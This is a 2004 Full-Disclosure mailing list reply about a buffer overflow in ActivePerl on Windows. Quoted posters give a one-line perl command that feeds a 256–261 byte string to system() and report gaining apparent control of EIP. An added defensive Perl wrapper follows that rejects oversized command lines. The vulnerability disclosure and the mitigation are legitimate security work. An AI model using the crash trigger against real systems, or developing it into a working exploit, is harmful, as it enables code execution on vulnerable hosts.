Re: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ?

From: npguy (npguy@websurfer.com.np)
Date: Tue May 18 2004 - 09:45:46 CDT


perl, v5.8.2 MSWin32-x86-multi-thread suffer the same.

Tuesday, May 18, 2004, 7:14:41 PM, you wrote:

NF> "Olivergreyhat.de" <Olivergreyhat.de> wrote:

>> i played around with ActiveState's ActivePerl for Win32, and crashed
>> Perl.exe with the following command:
>>
>> perl -e "$a="A" x 256; system($a)"

NF> Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
NF> all but last week's security patch:

NF> perl -e "$a="A" x 256; system($a)"

NF> perl.exe - Application error

NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x00657865. The memory could not be "written".

NF> Also, it is likely exploitable -- push up the number of A's a bit:

NF> C:\>perl -e "$a="A" x 259; system($a)"

NF> perl.exe - Application error

NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x65004141. The memory could not be "written".

NF> and we seem to get control of EIP. Coincidence? Try yet two more:

NF> C:\>perl -e "$a="A" x 261; system($a)"

NF> perl.exe - Application error

NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x41414141. The memory could not be "written".

NF> Looks like full control of EIP...

NF> However, there is not likely to be a privilege escalation here unless
NF> perhaps a script processor on a web server can be cajoled into doing
NF> something with this?? (Not at all familiar with the innards of Windows
NF> web servers and their relationship to their CGI, etc processors...)

npguy npguy@websurfer.com.np
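The thread's question is whether a CGI or other script processor could be made to feed a long string into system(). An added defensive example, not code from the thread or from ActiveState: a Perl wrapper that uses the list form of system() (so no shell parses the string) and rejects oversized or control-character-laden commands before they reach the runtime. The 200-byte ceiling is an assumption chosen to stay below the ~256-byte length at which the posters report perl.exe faulting; the thread does not establish the exact safe limit.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Conservative ceiling on the joined command line (assumption: kept well
# under the ~256 bytes at which the thread reports perl.exe crashing).
use constant MAX_CMDLINE => 200;

# guarded_system: run a command with the list/indirect-object form of
# system(), so arguments are passed as-is without shell interpretation,
# after refusing anything oversized or containing control characters.
# Returns the child's exit code, or undef (with a warning) when rejected.
sub guarded_system {
    my @argv = @_;
    return unless @argv;

    my $joined = join ' ', @argv;
    if (length($joined) > MAX_CMDLINE) {
        warn sprintf "rejected: command line is %d bytes (limit %d)\n",
            length($joined), MAX_CMDLINE;
        return;
    }
    if (grep { /[\x00-\x1f\x7f]/ } @argv) {
        warn "rejected: control characters in arguments\n";
        return;
    }

    my $rc = system { $argv[0] } @argv;   # no shell involved
    return if $rc == -1;                   # exec failed
    return $rc >> 8;
}

# Constructed inputs: a short legitimate command, and the 261-byte
# string from the thread, which is refused before system() is reached.
for my $case ([ 'hostname' ], [ 'A' x 261 ]) {
    my $rc    = guarded_system(@$case);
    my $label = substr($case->[0], 0, 8) . '..';
    printf "%-10s => %s\n", $label, defined $rc ? "exit $rc" : 'rejected';
}
```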

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html